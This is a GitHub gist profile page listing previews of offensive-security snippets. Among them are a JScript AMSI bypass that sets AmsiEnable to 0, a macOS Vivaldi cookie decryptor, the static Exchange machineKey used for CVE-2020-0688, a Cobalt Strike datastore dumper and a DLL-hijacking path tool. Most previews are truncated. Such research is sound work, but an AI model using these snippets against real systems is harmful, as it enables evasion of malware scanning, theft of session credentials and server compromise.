Skip to content

Instantly share code, notes, and snippets.

View rxwx's full-sized avatar

Rich Warren rxwx

513 followers · 0 following
View GitHub Profile
@rxwx
rxwx / dump_beacon_datastore.py
Last active September 25, 2023 19:34
Dump items (BOFs, assemblies, files etc.) from the CobaltStrike 4.9+ beacon datastore (stored with BeaconDataStoreProtectItem / data-store load)
View dump_beacon_datastore.py
from ctypes import wintypes
import argparse
import ctypes
import yara
import hexdump
"""
.text:0000000180010840 ; char __fastcall BeaconDataStoreUnprotectItem(unsigned __int64)
.text:0000000180010840 BeaconDataStoreUnprotectItem proc near ; CODE XREF: sub_1800100F8+9E↑p
.text:0000000180010840 ; sub_1800102E8+AD↑p
@rxwx
rxwx / trac-decode.py
Created September 7, 2023 17:54
Decode "Obscured" Check Point Trac.config files
View trac-decode.py
import io
import sys
import string
KEY_STR = 'ModifiedFwPropertySheetWithOKTheSheetIDS_LDAP_AU_PROPERTIESNULL0FW_WP_OBJECTS'
def get_byte(x):
c = ord(chr(x).lower())
if ((c - 0x30) & 255) < 10:
retval = c - 0x30
@rxwx
rxwx / GetSxsPath.cs
Created July 3, 2023 12:43
Determine redirection path for SxS DotLocal DLL Hijacking
View GetSxsPath.cs
using System;
using System.IO;
using System.Text;
using System.Diagnostics;
using System.Runtime.InteropServices;
using static GetSxsPath.NativeMethods;
namespace GetSxsPath
{
internal class NativeMethods
@rxwx
rxwx / offver.py
Created April 15, 2020 10:23
Get Office version that last saved the file
View offver.py
import re
import sys
versions = {
0x00: 'Excel 97',
0x01: 'Excel 2000',
0x02: 'Excel 2002',
0x03: 'Office Excel 2003',
0x04: 'Office Excel 2007',
0x06: 'Excel 2010',
@rxwx
rxwx / vivaldi-decrypt.py
Last active May 14, 2020 13:03
Decrypt Vivaldi Cookies on MacOS
View vivaldi-decrypt.py
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
import sqlite3
import os
import shutil
def clean(x):
return x[:-ord(x[-1])]
# Make a copy of the cookie file
@rxwx
rxwx / CVE-2020-0688.config
Created February 14, 2020 16:38
CVE-2020-0688
View CVE-2020-0688.config
<machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" decryptionKey="E9D2490BD0075B51D1BA5288514514AF" validation="SHA1" decryption="3DES" />
@rxwx
rxwx / pulseversion.py
Created August 13, 2019 09:04
Pulse Secure Version Scanner
View pulseversion.py
import requests
import sys
import re
HEADERS = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0"}
if len(sys.argv) != 2:
print " Usage: python pulseversion.py <target ip/domain>"
sys.exit(1)
@rxwx
rxwx / bypass.js
Created August 16, 2018 17:14
AMSIEnable Bypass in JScript
View bypass.js
var sh = new ActiveXObject('WScript.Shell');
var key = "HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable";
try{
var AmsiEnable = sh.RegRead(key);
if(AmsiEnable!=0){
throw new Error(1, '');
}
}catch(e){
sh.RegWrite(key, 0, "REG_DWORD"); // neuter AMSI
@rxwx
rxwx / ziptool.ps1
Created May 4, 2018 17:47
File Zip in native PowerShell with .NET 3.0
View ziptool.ps1
<#
.SYNOPSIS
Author: Rich Warren
Based on original c# code by Jon Galloway:
https://weblogs.asp.net/jongalloway/creating-zip-archives-in-net-without-an-external-library-like-sharpziplib
.DESCRIPTION
Tool for creating a Zip file in native Powershell with .NET 3.0 only.
@rxwx
rxwx / notes.md
Last active February 21, 2020 06:19
Notes on new Equation Editor Exploit, CVE-2018-0802 variant
View notes.md

New Equation Editor Exploit Variant

On 19/03/18, a large number of RTF samples started triggering one of my "suspicious" RTF rules. Looking at the samples, they all appeared to have around 2-4 detections, which seemed curious. This was confirmed by Mitja Kolsek to be a new variant of CVE-2018-0802, which is already covered by 0patch, and patched by Microsoft in January 2018. However, the technique is not unique to CVE-2018-0802 and can be seen used to exploit CVE-2017-11882 aswell.

This was also seen by Shiao Qu. There is a [blog post](https://www.drop